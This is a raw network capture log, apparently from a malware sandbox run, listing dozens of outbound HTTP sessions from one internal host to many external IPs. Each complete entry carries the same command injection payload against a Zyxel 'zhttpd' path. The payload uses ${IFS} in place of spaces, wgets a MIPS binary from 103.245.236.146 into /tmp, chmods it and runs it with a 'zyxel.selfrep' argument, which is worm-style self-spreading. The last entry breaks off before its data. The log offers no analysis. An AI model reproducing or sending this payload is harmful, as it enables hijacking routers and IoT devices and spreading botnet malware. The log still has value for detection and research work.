                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7871192.168.2.235399288.231.41.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017524004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7872192.168.2.2336624142.93.226.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017543077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7873192.168.2.234969896.236.56.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017574072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7874192.168.2.2338344143.88.228.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017604113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7875192.168.2.2358270154.216.102.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017642021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7876192.168.2.2340968164.163.38.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017678022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7877192.168.2.2346550193.179.200.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017715931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7878192.168.2.2346050165.182.23.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017750025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7879192.168.2.2335100187.219.116.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017757893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7880192.168.2.2346892181.101.153.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017796040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7881192.168.2.2348466117.135.207.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017802000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7882192.168.2.233623425.44.242.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017838955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7883192.168.2.233845235.123.17.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017872095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7884192.168.2.2346800205.196.39.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017914057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7885192.168.2.2360694187.161.207.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017925978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7886192.168.2.233525814.242.44.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017950058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7887192.168.2.2345552198.12.51.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017973900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7888192.168.2.234467264.189.3.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.017982960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7889192.168.2.2357732108.166.175.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018009901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7890192.168.2.2344646170.44.178.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018069983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7891192.168.2.2336816124.89.233.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018102884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7892192.168.2.2341918149.129.87.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018147945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7893192.168.2.233329839.227.85.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018179893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7894192.168.2.233448825.102.234.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018198967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7895192.168.2.2335482212.125.2.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018218040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7896192.168.2.2348298220.226.188.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018254042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7897192.168.2.2352890117.171.119.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018280983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7898192.168.2.2336886128.106.125.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018317938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7899192.168.2.2342704110.178.212.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018347979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7900192.168.2.234292860.213.43.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018369913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7901192.168.2.2351592123.240.84.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018397093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7902192.168.2.235844868.122.73.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018416882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7903192.168.2.2348596194.241.148.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018474102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7904192.168.2.235722866.28.113.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018496990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7905192.168.2.233843812.191.11.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018507004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7906192.168.2.2359828194.121.90.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018529892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7907192.168.2.2356606139.176.151.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018558025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7908192.168.2.233779869.244.98.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018567085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7909192.168.2.2351628116.73.123.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018594980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7910192.168.2.2334804117.143.176.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018632889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7911192.168.2.234736875.129.39.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018663883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7912192.168.2.235827476.64.91.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018663883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7913192.168.2.2347484131.46.158.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018688917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7914192.168.2.2348698163.74.31.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018723965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7915192.168.2.2352558176.153.224.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018764973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7916192.168.2.236027414.107.90.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018779993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7917192.168.2.233645657.14.148.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018809080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7918192.168.2.235662027.87.159.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018836021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7919192.168.2.235684664.225.40.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018867016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7920192.168.2.234371444.200.33.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018889904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7921192.168.2.2352792180.56.65.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018925905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7922192.168.2.235859214.191.133.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018949986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7923192.168.2.235949650.87.44.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.018996954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7924192.168.2.2354320109.95.142.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019023895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7925192.168.2.2335220111.212.144.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019049883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7926192.168.2.2355156129.248.143.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019090891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7927192.168.2.235150894.220.35.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019102097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7928192.168.2.233608291.184.4.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019104958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7929192.168.2.2346236202.165.209.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019146919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7930192.168.2.2342938109.236.163.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019161940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7931192.168.2.235727042.222.52.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019212008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7932192.168.2.2358914219.212.30.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.019251108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7933192.168.2.2333114115.116.41.208443
                                                TimestampBytes transferredDirectionData
